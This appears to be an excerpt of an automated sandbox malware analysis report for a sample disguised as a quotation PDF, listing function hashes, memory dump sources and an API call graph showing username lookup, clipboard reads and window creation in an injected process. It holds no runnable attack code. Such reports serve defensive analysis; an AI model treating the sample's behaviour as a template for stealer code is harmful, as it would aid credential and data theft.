                                                                            • Opcode Fuzzy Hash: 332f9049eac4cb7492229817dbc3bc49452c456ac3cfd20d0cc39cd66dac4043
                                                                            • Instruction Fuzzy Hash: 43E19370E002298FCB19CF69C884BADF7F2FF88304F15C5A9D45A9B255DB349985CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD6FFB Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            • Opcode ID: f463920e6b01a24ae0a39ee6a4717a374f26cce76b9a47245a354d0e5c4e1882
                                                                            • Instruction ID: 3509b55fd6632800e0cc02fc9d28f26e62b9cb8cbc7ee41943e67283305f6dd1
                                                                            • Opcode Fuzzy Hash: f463920e6b01a24ae0a39ee6a4717a374f26cce76b9a47245a354d0e5c4e1882
                                                                            • Instruction Fuzzy Hash: 9F918170E002198FDB19CF65CD80BADF7B2BF88304F25C6A9D456AB255DB34A985CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD6B2C Relevance: .1, Instructions: 109COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ca7fa3b7bf3cc85080f07af10f232ad0314d5873c71494b51326820ad46ccf78
                                                                            • Instruction ID: 2ef2611e8e0ed4cfef2ae286282763593ad0c9f8954eed97ff77326fc1b6b4f7
                                                                            • Opcode Fuzzy Hash: ca7fa3b7bf3cc85080f07af10f232ad0314d5873c71494b51326820ad46ccf78
                                                                            • Instruction Fuzzy Hash: A741F579D9410B9BEF60CBA9E680AAEB7F1BB48304F14E615E016EB244DF35D945CF40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD4123 Relevance: 5.0, Strings: 4, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TJeq$jjjjjj$$`q$$`q
                                                                            • API String ID: 0-1659808662
                                                                            • Opcode ID: e3d6b1cbb7b1e6249c25616b14a59429e28674843abb04de82604b53502dedce
                                                                            • Instruction ID: 6fe32769169a4aa5c7503503a70e5c63efeeb4cad0000f9c73b184309c44c39f
                                                                            • Opcode Fuzzy Hash: e3d6b1cbb7b1e6249c25616b14a59429e28674843abb04de82604b53502dedce
                                                                            • Instruction Fuzzy Hash: 50B0926280E384CECB534E5599C01407F70BA6214030EC1EAC8840F44BD1208A86DB22
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADBD3D Relevance: 5.0, Strings: 4, Instructions: 5COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TJeq$jjjjjj$$`q$$`q
                                                                            • API String ID: 0-1659808662
                                                                            • Opcode ID: 28aa7ee81ab78f11b76cb8eb069e1ef91d7cfa5b742bfb2a10c32657d2886d37
                                                                            • Instruction ID: de0ab4f934435645dd08afd94158bea0168c325805149a904e23cb936d8b6a3a
                                                                            • Opcode Fuzzy Hash: 28aa7ee81ab78f11b76cb8eb069e1ef91d7cfa5b742bfb2a10c32657d2886d37
                                                                            • Instruction Fuzzy Hash: 8BB0126100D3C08EC3130A5594C11003E208B3304030A41D5C4C18B9A7C1008A84CBB1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:11.8%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0.7%
                                                                            Total number of Nodes:457
                                                                            Total number of Limit Nodes:45
                                                                            execution_graph 24664 510d030 24665 510d048 24664->24665 24666 510d0a2 24665->24666 24675 ab08fec 24665->24675 24679 ab08ffc 24665->24679 24687 ab09045 24665->24687 24695 ab0f783 24665->24695 24703 ab0b232 24665->24703 24708 ab0b110 24665->24708 24714 ab0b0ff 24665->24714 24720 ab08fdd 24665->24720 24676 ab08ff7 24675->24676 24724 ab09024 24676->24724 24678 ab0b247 24678->24666 24680 ab09007 24679->24680 24681 ab0f809 24680->24681 24683 ab0f7f9 24680->24683 24759 ab0e914 24681->24759 24747 ab0f930 24683->24747 24753 ab0f920 24683->24753 24684 ab0f807 24688 ab09004 24687->24688 24689 ab0f809 24688->24689 24692 ab0f7f9 24688->24692 24690 ab0e914 7 API calls 24689->24690 24691 ab0f807 24690->24691 24693 ab0f930 7 API calls 24692->24693 24694 ab0f920 7 API calls 24692->24694 24693->24691 24694->24691 24698 ab0f7d5 24695->24698 24696 ab0f809 24697 ab0e914 7 API calls 24696->24697 24700 ab0f807 24697->24700 24698->24696 24699 ab0f7f9 24698->24699 24701 ab0f930 7 API calls 24699->24701 24702 ab0f920 7 API calls 24699->24702 24701->24700 24702->24700 24704 ab0b204 24703->24704 24705 ab0b23a 24703->24705 24704->24666 24706 ab0b247 24705->24706 24707 ab09024 GetModuleHandleW 24705->24707 24706->24666 24707->24706 24709 ab0b136 24708->24709 24710 ab08fec GetModuleHandleW 24709->24710 24711 ab0b142 24710->24711 24712 ab08ffc 7 API calls 24711->24712 24713 ab0b157 24712->24713 24713->24666 24715 ab0b136 24714->24715 24716 ab08fec GetModuleHandleW 24715->24716 24717 ab0b142 24716->24717 24718 ab08ffc 7 API calls 24717->24718 24719 ab0b157 24718->24719 24719->24666 24721 ab08fe5 24720->24721 24722 ab09024 GetModuleHandleW 24721->24722 24723 ab0b247 24722->24723 24723->24666 24725 ab0902f 24724->24725 24730 ab08278 24725->24730 24727 ab0b2a9 24729 ab0b317 24727->24729 24734 ab08288 24727->24734 24729->24678 24731 ab08283 24730->24731 24732 ab0996b 24731->24732 24738 ab09b91 24731->24738 24732->24727 24735 ab09eb0 GetModuleHandleW 24734->24735 24737 ab09f25 24735->24737 24737->24729 24739 ab08288 GetModuleHandleW 24738->24739 24740 ab09ba9 24739->24740 24741 ab08288 GetModuleHandleW 24740->24741 24746 ab09d74 24740->24746 24742 ab09cfa 24741->24742 24743 ab08288 GetModuleHandleW 24742->24743 24742->24746 24744 ab09d48 24743->24744 24745 ab08288 GetModuleHandleW 24744->24745 24744->24746 24745->24746 24746->24732 24750 ab0f93e 24747->24750 24748 ab0e914 7 API calls 24748->24750 24749 ab0fa1e 24749->24684 24750->24748 24750->24749 24766 52aed20 24750->24766 24778 52aed30 24750->24778 24756 ab0f93e 24753->24756 24754 ab0e914 7 API calls 24754->24756 24755 ab0fa1e 24755->24684 24756->24754 24756->24755 24757 52aed20 6 API calls 24756->24757 24758 52aed30 5 API calls 24756->24758 24757->24756 24758->24756 24760 ab0e91f 24759->24760 24761 ab0fb24 24760->24761 24762 ab0fa7a 24760->24762 24763 ab08ffc 6 API calls 24761->24763 24764 ab0fad2 CallWindowProcW 24762->24764 24765 ab0fa81 24762->24765 24763->24765 24764->24765 24765->24684 24767 52aeceb KiUserCallbackDispatcher 24766->24767 24769 52aed2f 24766->24769 24768 52aecfe 24767->24768 24768->24750 24770 52aee96 24769->24770 24771 52a1458 GetModuleHandleW 24769->24771 24775 52aeda6 24769->24775 24788 52aef28 24769->24788 24794 52aef18 24769->24794 24800 52a1458 24770->24800 24771->24769 24774 52a1458 GetModuleHandleW 24774->24775 24775->24750 24781 52aed4f 24778->24781 24779 52a1458 GetModuleHandleW 24779->24781 24780 52aee96 24782 52a1458 GetModuleHandleW 24780->24782 24781->24779 24781->24780 24785 52aeda6 24781->24785 24786 52aef28 4 API calls 24781->24786 24787 52aef18 4 API calls 24781->24787 24783 52aeebe 24782->24783 24784 52a1458 GetModuleHandleW 24783->24784 24784->24785 24785->24750 24786->24781 24787->24781 24790 52aef30 24788->24790 24789 52aef44 24789->24769 24790->24789 24818 52aef63 24790->24818 24831 52aef70 24790->24831 24791 52aef59 24791->24769 24796 52aef30 24794->24796 24795 52aef44 24795->24769 24796->24795 24798 52aef63 4 API calls 24796->24798 24799 52aef70 4 API calls 24796->24799 24797 52aef59 24797->24769 24798->24797 24799->24797 24802 52a1478 24800->24802 24801 52a16f6 24801->24774 24802->24801 24879 52a72e1 24802->24879 24890 52a82e0 24802->24890 24895 52a1821 24802->24895 24914 52a1a38 24802->24914 24920 52a1a48 24802->24920 24926 ab08249 24802->24926 24930 ab08259 24802->24930 24934 ab08298 24802->24934 24938 ab082b8 24802->24938 24942 ab08245 24802->24942 24946 ab08255 24802->24946 24950 ab08251 24802->24950 24954 ab08261 24802->24954 24958 ab0825d 24802->24958 24962 ab0824d 24802->24962 24819 52aef82 24818->24819 24820 52aef9d 24819->24820 24822 52aefe1 24819->24822 24826 52aef63 4 API calls 24820->24826 24827 52aef70 4 API calls 24820->24827 24821 52aefa3 24821->24791 24844 52af111 24822->24844 24824 52af07f 24824->24791 24825 52af061 24825->24791 24826->24821 24827->24821 24832 52aef82 24831->24832 24833 52aef9d 24832->24833 24835 52aefe1 24832->24835 24839 52aef63 4 API calls 24833->24839 24840 52aef70 4 API calls 24833->24840 24834 52aefa3 24834->24791 24843 52af111 2 API calls 24835->24843 24836 52af05d 24838 52af061 24836->24838 24841 52af238 2 API calls 24836->24841 24842 52af229 2 API calls 24836->24842 24837 52af07f 24837->24791 24838->24791 24839->24834 24840->24834 24841->24837 24842->24837 24843->24836 24845 52af128 24844->24845 24859 52af148 24845->24859 24864 52af138 24845->24864 24846 52af05d 24846->24825 24849 52af238 24846->24849 24854 52af229 24846->24854 24850 52af24d 24849->24850 24851 52af273 24850->24851 24873 52af2e0 24850->24873 24876 52af2d4 24850->24876 24851->24824 24855 52af24d 24854->24855 24856 52af273 24855->24856 24857 52af2e0 OleGetClipboard 24855->24857 24858 52af2d4 OleGetClipboard 24855->24858 24856->24824 24857->24855 24858->24855 24860 52af153 24859->24860 24861 52af163 24860->24861 24869 52af198 OleInitialize 24860->24869 24871 52af190 OleInitialize 24860->24871 24861->24846 24865 52af153 24864->24865 24866 52af163 24865->24866 24867 52af198 OleInitialize 24865->24867 24868 52af190 OleInitialize 24865->24868 24866->24846 24867->24866 24868->24866 24870 52af1fc 24869->24870 24870->24861 24872 52af1fc 24871->24872 24872->24861 24874 52af33a OleGetClipboard 24873->24874 24875 52af37a 24874->24875 24877 52af33a OleGetClipboard 24876->24877 24878 52af37a 24877->24878 24880 52a7308 24879->24880 24881 52a1458 GetModuleHandleW 24880->24881 24887 52a734c 24880->24887 24882 52a73be 24881->24882 24883 52a1458 GetModuleHandleW 24882->24883 24884 52a73d1 24883->24884 24966 52a7440 24884->24966 24972 52a7431 24884->24972 24885 52a73e4 24886 52a1458 GetModuleHandleW 24885->24886 24886->24887 24887->24802 24891 52a8306 24890->24891 24892 52a83b7 24891->24892 24978 52a887f 24891->24978 24985 52a8890 24891->24985 24892->24802 24897 52a171e 24895->24897 24898 52a182b 24895->24898 24896 52a181c 24896->24802 24897->24896 24899 52a82e0 GetModuleHandleW 24897->24899 24900 52a1a38 GetModuleHandleW 24897->24900 24901 52a1a48 GetModuleHandleW 24897->24901 24902 ab08261 GetModuleHandleW 24897->24902 24903 ab08251 GetModuleHandleW 24897->24903 24904 ab08255 GetModuleHandleW 24897->24904 24905 ab08245 GetModuleHandleW 24897->24905 24906 ab082b8 GetModuleHandleW 24897->24906 24907 ab08298 GetModuleHandleW 24897->24907 24908 ab08259 GetModuleHandleW 24897->24908 24909 ab08249 GetModuleHandleW 24897->24909 24910 ab0825d GetModuleHandleW 24897->24910 24911 ab0824d GetModuleHandleW 24897->24911 24912 52a72e1 GetModuleHandleW 24897->24912 24913 52a1821 GetModuleHandleW 24897->24913 24898->24802 24899->24897 24900->24897 24901->24897 24902->24897 24903->24897 24904->24897 24905->24897 24906->24897 24907->24897 24908->24897 24909->24897 24910->24897 24911->24897 24912->24897 24913->24897 24916 52a1a48 24914->24916 24915 52a1458 GetModuleHandleW 24915->24916 24916->24915 24917 52a1b5a 24916->24917 25058 52a1c30 24916->25058 25071 52a1b60 24916->25071 24917->24802 24921 52a1a4f 24920->24921 24922 52a1458 GetModuleHandleW 24921->24922 24923 52a1b5a 24921->24923 24924 52a1c30 GetModuleHandleW 24921->24924 24925 52a1b60 GetModuleHandleW 24921->24925 24922->24921 24923->24802 24924->24921 24925->24921 24927 ab0825d 24926->24927 24929 ab08345 24927->24929 25104 ab07ef4 24927->25104 24929->24802 24931 ab0825d 24930->24931 24932 ab07ef4 GetModuleHandleW 24931->24932 24933 ab08345 24931->24933 24932->24933 24933->24802 24935 ab0825d 24934->24935 24935->24934 24936 ab07ef4 GetModuleHandleW 24935->24936 24937 ab08345 24935->24937 24936->24937 24937->24802 24939 ab082ca 24938->24939 24940 ab07ef4 GetModuleHandleW 24939->24940 24941 ab08345 24939->24941 24940->24941 24941->24802 24943 ab0825d 24942->24943 24944 ab07ef4 GetModuleHandleW 24943->24944 24945 ab08345 24943->24945 24944->24945 24945->24802 24947 ab0825d 24946->24947 24948 ab07ef4 GetModuleHandleW 24947->24948 24949 ab08345 24947->24949 24948->24949 24949->24802 24951 ab0825d 24950->24951 24952 ab07ef4 GetModuleHandleW 24951->24952 24953 ab08345 24951->24953 24952->24953 24953->24802 24955 ab0825d 24954->24955 24956 ab07ef4 GetModuleHandleW 24955->24956 24957 ab08345 24955->24957 24956->24957 24957->24802 24959 ab08265 24958->24959 24959->24958 24960 ab07ef4 GetModuleHandleW 24959->24960 24961 ab08345 24959->24961 24960->24961 24961->24802 24963 ab0825d 24962->24963 24964 ab07ef4 GetModuleHandleW 24963->24964 24965 ab08345 24963->24965 24964->24965 24965->24802 24967 52a745c 24966->24967 24968 52a1458 GetModuleHandleW 24967->24968 24969 52a74db 24968->24969 24970 52a1458 GetModuleHandleW 24969->24970 24971 52a753f 24970->24971 24973 52a745c 24972->24973 24974 52a1458 GetModuleHandleW 24973->24974 24975 52a74db 24974->24975 24976 52a1458 GetModuleHandleW 24975->24976 24977 52a753f 24976->24977 24980 52a8899 24978->24980 24979 52a1458 GetModuleHandleW 24979->24980 24980->24979 24981 52a8c95 24980->24981 24992 52a8d40 24980->24992 24996 52aa5eb 24980->24996 25001 52aa538 24980->25001 24981->24891 24986 52a8899 24985->24986 24987 52a1458 GetModuleHandleW 24986->24987 24988 52a8c95 24986->24988 24989 52aa5eb GetModuleHandleW 24986->24989 24990 52aa538 GetModuleHandleW 24986->24990 24991 52a8d40 GetModuleHandleW 24986->24991 24987->24986 24988->24891 24989->24986 24990->24986 24991->24986 24994 52a8d4e 24992->24994 24993 52aa45c 24993->24980 24994->24993 24995 52a1458 GetModuleHandleW 24994->24995 24995->24994 24997 52aa5c0 24996->24997 24998 52aa601 24997->24998 25006 52aa648 24997->25006 25013 52aa641 24997->25013 25003 52aa565 25001->25003 25002 52aa601 25003->25002 25004 52aa648 GetModuleHandleW 25003->25004 25005 52aa641 GetModuleHandleW 25003->25005 25004->25003 25005->25003 25009 52aa662 25006->25009 25007 52aa72b 25008 52a1458 GetModuleHandleW 25008->25009 25009->25007 25009->25008 25020 52aa880 25009->25020 25028 52aa782 25009->25028 25036 52aaaa9 25009->25036 25016 52aa662 25013->25016 25014 52aa72b 25015 52a1458 GetModuleHandleW 25015->25016 25016->25014 25016->25015 25017 52aaaa9 GetModuleHandleW 25016->25017 25018 52aa782 GetModuleHandleW 25016->25018 25019 52aa880 GetModuleHandleW 25016->25019 25017->25016 25018->25016 25019->25016 25023 52aa789 25020->25023 25021 52aaad8 25021->25009 25022 52a1458 GetModuleHandleW 25022->25023 25023->25021 25023->25022 25024 52aaafb GetModuleHandleW 25023->25024 25025 52aab00 GetModuleHandleW 25023->25025 25044 52ae2bf 25023->25044 25051 52ae2d0 25023->25051 25024->25023 25025->25023 25030 52aa789 25028->25030 25029 52aaad8 25029->25009 25030->25029 25031 52a1458 GetModuleHandleW 25030->25031 25032 52aaafb GetModuleHandleW 25030->25032 25033 52aab00 GetModuleHandleW 25030->25033 25034 52ae2bf GetModuleHandleW 25030->25034 25035 52ae2d0 GetModuleHandleW 25030->25035 25031->25030 25032->25030 25033->25030 25034->25030 25035->25030 25039 52aa789 25036->25039 25037 52aaad8 25037->25009 25038 52a1458 GetModuleHandleW 25038->25039 25039->25037 25039->25038 25040 52ae2bf GetModuleHandleW 25039->25040 25041 52ae2d0 GetModuleHandleW 25039->25041 25042 52aaafb GetModuleHandleW 25039->25042 25043 52aab00 GetModuleHandleW 25039->25043 25040->25039 25041->25039 25042->25039 25043->25039 25045 52ae2df 25044->25045 25047 52ae33f 25044->25047 25045->25023 25046 52a1458 GetModuleHandleW 25050 52ae4f4 25046->25050 25047->25046 25048 52ae484 25047->25048 25048->25023 25049 52a1458 GetModuleHandleW 25049->25050 25050->25048 25050->25049 25052 52ae2df 25051->25052 25054 52ae33f 25051->25054 25052->25023 25053 52a1458 GetModuleHandleW 25057 52ae4f4 25053->25057 25054->25053 25055 52ae484 25054->25055 25055->25023 25056 52a1458 GetModuleHandleW 25056->25057 25057->25055 25057->25056 25059 52a1bbe 25058->25059 25061 52a1c3a 25058->25061 25060 52a1458 GetModuleHandleW 25059->25060 25062 52a1bd5 25060->25062 25063 52a1458 GetModuleHandleW 25061->25063 25064 52a1c01 25062->25064 25065 52a1458 GetModuleHandleW 25062->25065 25068 52a1c7a 25063->25068 25064->24916 25066 52a1bf5 25065->25066 25067 52a1458 GetModuleHandleW 25066->25067 25067->25064 25069 52a1d0a 25068->25069 25070 52a1458 GetModuleHandleW 25068->25070 25069->25069 25070->25068 25072 52a1b89 25071->25072 25081 52a1c30 GetModuleHandleW 25072->25081 25085 52a1c40 25072->25085 25073 52a1ba5 25091 52a5351 25073->25091 25098 52a5360 25073->25098 25075 52a1458 GetModuleHandleW 25076 52a1bd5 25075->25076 25077 52a1458 GetModuleHandleW 25076->25077 25080 52a1c01 25076->25080 25078 52a1bf5 25077->25078 25079 52a1458 GetModuleHandleW 25078->25079 25079->25080 25080->24916 25081->25073 25086 52a1c56 25085->25086 25087 52a1458 GetModuleHandleW 25086->25087 25090 52a1c7a 25087->25090 25088 52a1d0a 25088->25088 25089 52a1458 GetModuleHandleW 25089->25090 25090->25088 25090->25089 25092 52a5356 25091->25092 25094 52a1bad 25091->25094 25093 52a1458 GetModuleHandleW 25092->25093 25097 52a53a3 25093->25097 25094->25075 25095 52a5424 25095->25095 25096 52a1458 GetModuleHandleW 25096->25097 25097->25095 25097->25096 25099 52a5376 25098->25099 25100 52a1458 GetModuleHandleW 25099->25100 25103 52a53a3 25100->25103 25101 52a5424 25101->25101 25102 52a1458 GetModuleHandleW 25102->25103 25103->25101 25103->25102 25105 ab07eff 25104->25105 25109 ab09480 25105->25109 25120 ab0946b 25105->25120 25106 ab08522 25106->24929 25110 ab094ab 25109->25110 25111 ab08278 GetModuleHandleW 25110->25111 25112 ab09512 25111->25112 25119 ab08278 GetModuleHandleW 25112->25119 25131 ab09951 25112->25131 25136 ab09900 25112->25136 25141 ab099d0 25112->25141 25113 ab0952e 25114 ab08288 GetModuleHandleW 25113->25114 25115 ab0955a 25113->25115 25114->25115 25119->25113 25121 ab094ab 25120->25121 25122 ab08278 GetModuleHandleW 25121->25122 25123 ab09512 25122->25123 25127 ab099d0 GetModuleHandleW 25123->25127 25128 ab09900 GetModuleHandleW 25123->25128 25129 ab09951 GetModuleHandleW 25123->25129 25130 ab08278 GetModuleHandleW 25123->25130 25124 ab0952e 25125 ab08288 GetModuleHandleW 25124->25125 25126 ab0955a 25124->25126 25125->25126 25127->25124 25128->25124 25129->25124 25130->25124 25132 ab0996b 25131->25132 25133 ab0996f 25131->25133 25132->25113 25134 ab09aae 25133->25134 25135 ab09b91 GetModuleHandleW 25133->25135 25135->25134 25137 ab09915 25136->25137 25138 ab0997a 25136->25138 25137->25113 25139 ab09aae 25138->25139 25140 ab09b91 GetModuleHandleW 25138->25140 25140->25139 25142 ab09a2d 25141->25142 25143 ab09aae 25142->25143 25144 ab09b91 GetModuleHandleW 25142->25144 25144->25143 25145 52a0848 25147 52a084e 25145->25147 25146 52a091b 25147->25146 25149 52a1458 GetModuleHandleW 25147->25149 25150 52a1821 GetModuleHandleW 25147->25150 25151 52a144b 25147->25151 25149->25147 25150->25147 25152 52a141f 25151->25152 25154 52a1453 25151->25154 25152->25147 25153 52a16f6 25153->25147 25154->25153 25155 52a72e1 GetModuleHandleW 25154->25155 25156 52a1821 GetModuleHandleW 25154->25156 25157 52a82e0 GetModuleHandleW 25154->25157 25158 52a1a38 GetModuleHandleW 25154->25158 25159 52a1a48 GetModuleHandleW 25154->25159 25160 ab08261 GetModuleHandleW 25154->25160 25161 ab08251 GetModuleHandleW 25154->25161 25162 ab08255 GetModuleHandleW 25154->25162 25163 ab08245 GetModuleHandleW 25154->25163 25164 ab082b8 GetModuleHandleW 25154->25164 25165 ab08298 GetModuleHandleW 25154->25165 25166 ab08259 GetModuleHandleW 25154->25166 25167 ab08249 GetModuleHandleW 25154->25167 25168 ab0825d GetModuleHandleW 25154->25168 25169 ab0824d GetModuleHandleW 25154->25169 25155->25154 25156->25154 25157->25154 25158->25154 25159->25154 25160->25154 25161->25154 25162->25154 25163->25154 25164->25154 25165->25154 25166->25154 25167->25154 25168->25154 25169->25154 25170 ab0af58 25171 ab0afc0 CreateWindowExW 25170->25171 25173 ab0b07c 25171->25173 25173->25173 25174 ab09ea8 25175 ab09ead GetModuleHandleW 25174->25175 25177 ab09f25 25175->25177 25178 ab0ec68 25179 ab0ec1e DuplicateHandle 25178->25179 25181 ab0ec77 25178->25181 25180 ab0ec3e 25179->25180 25182 52aec50 25183 52aec58 25182->25183 25184 52aec7b 25183->25184 25186 52aed20 6 API calls 25183->25186 25188 52aec88 25183->25188 25192 52aec90 25183->25192 25186->25183 25189 52aecd1 KiUserCallbackDispatcher 25188->25189 25191 52aecfe 25189->25191 25191->25183 25193 52aecd1 KiUserCallbackDispatcher 25192->25193 25195 52aecfe 25193->25195 25195->25183 25196 52a8cb0 25197 52a8cc8 25196->25197 25198 52a1458 GetModuleHandleW 25197->25198 25199 52a8cdd 25198->25199 25200 52a70f0 25203 52a7151 GetUserNameW 25200->25203 25202 52a723d 25203->25202

                                                                            Executed Functions

                                                                            Function 052A70F0 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 920 52a70f0-52a714f 921 52a71ba-52a71be 920->921 922 52a7151-52a717c 920->922 923 52a71e9-52a71f4 921->923 924 52a71c0-52a71e3 921->924 931 52a717e-52a7180 922->931 932 52a71ac 922->932 925 52a7200-52a723b GetUserNameW 923->925 926 52a71f6-52a71fe 923->926 924->923 929 52a723d-52a7243 925->929 930 52a7244-52a725a 925->930 926->925 929->930 933 52a725c-52a7268 930->933 934 52a7270-52a7297 930->934 936 52a71a2-52a71aa 931->936 937 52a7182-52a718c 931->937 935 52a71b1-52a71b4 932->935 933->934 945 52a7299-52a729d 934->945 946 52a72a7 934->946 935->921 936->935 941 52a718e 937->941 942 52a7190-52a719e 937->942 941->942 942->942 943 52a71a0 942->943 943->936 945->946 947 52a729f-52a72a2 call 52a0a00 945->947 949 52a72a8 946->949 947->946 949->949
                                                                            APIs
                                                                            • GetUserNameW.ADVAPI32(00000000,00000000), ref: 052A722B
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472498830.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_52a0000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID:
                                                                            • API String ID: 2645101109-0
                                                                            • Opcode ID: 7cf63bab8e981ef3cf8c306c78d2e991af23a8df99a1eec0eaa166fe068a1ea9
                                                                            • Instruction ID: d8916634717f2f1eceb1e6dcbdcd6be9ba8e2dc6acdc2f43a155ea373cad1650
                                                                            • Opcode Fuzzy Hash: 7cf63bab8e981ef3cf8c306c78d2e991af23a8df99a1eec0eaa166fe068a1ea9
                                                                            • Instruction Fuzzy Hash: BF51F672D102198FDB14CFA9C888B9DBBF1FF48314F188129E81AAB355D774A845CF99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 052A70E4 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 890 52a70e4-52a714f 891 52a71ba-52a71be 890->891 892 52a7151-52a717c 890->892 893 52a71e9-52a71f4 891->893 894 52a71c0-52a71e3 891->894 901 52a717e-52a7180 892->901 902 52a71ac 892->902 895 52a7200-52a723b GetUserNameW 893->895 896 52a71f6-52a71fe 893->896 894->893 899 52a723d-52a7243 895->899 900 52a7244-52a725a 895->900 896->895 899->900 903 52a725c-52a7268 900->903 904 52a7270-52a7297 900->904 906 52a71a2-52a71aa 901->906 907 52a7182-52a718c 901->907 905 52a71b1-52a71b4 902->905 903->904 915 52a7299-52a729d 904->915 916 52a72a7 904->916 905->891 906->905 911 52a718e 907->911 912 52a7190-52a719e 907->912 911->912 912->912 913 52a71a0 912->913 913->906 915->916 917 52a729f-52a72a2 call 52a0a00 915->917 919 52a72a8 916->919 917->916 919->919
                                                                            APIs
                                                                            • GetUserNameW.ADVAPI32(00000000,00000000), ref: 052A722B
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472498830.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_52a0000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID:
                                                                            • API String ID: 2645101109-0
                                                                            • Opcode ID: 81de537d1f878c6535b4cdcb346bec9670256f9173dffae5e110cf6244ff32f7
                                                                            • Instruction ID: 127c54719b6a91b87f821d45120769596ecbae19680e2a3a07c5c1d0107ab9b2
                                                                            • Opcode Fuzzy Hash: 81de537d1f878c6535b4cdcb346bec9670256f9173dffae5e110cf6244ff32f7
                                                                            • Instruction Fuzzy Hash: 0D51F471E102198FDB14CFA9C888B9DBBF1FF48314F18852AE81AAB354D7749845CF99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0AB0AF4C Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 950 ab0af4c-ab0afbe 951 ab0afc0-ab0afc6 950->951 952 ab0afc9-ab0afd0 950->952 951->952 953 ab0afd2-ab0afd8 952->953 954 ab0afdb-ab0b013 952->954 953->954 955 ab0b01b-ab0b07a CreateWindowExW 954->955 956 ab0b083-ab0b0bb 955->956 957 ab0b07c-ab0b082 955->957 961 ab0b0c8 956->961 962 ab0b0bd-ab0b0c0 956->962 957->956 963 ab0b0c9 961->963 962->961 963->963
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0AB0B06A
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.473814006.000000000AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB00000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_ab00000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: 2ff8fafff69eaa2f7cecd11ef73310a0b596b6939636f37a03f767c25fb3be94
                                                                            • Instruction ID: 572ead805deca76a04d75cba0166bbd66ae46ffc2eb53293546f50d7711119e2
                                                                            • Opcode Fuzzy Hash: 2ff8fafff69eaa2f7cecd11ef73310a0b596b6939636f37a03f767c25fb3be94
                                                                            • Instruction Fuzzy Hash: F751D2B1D103099FDB14CF99C984ADEBFB1FF88314F24856AE818AB250D7759885CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0AB0AF58 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
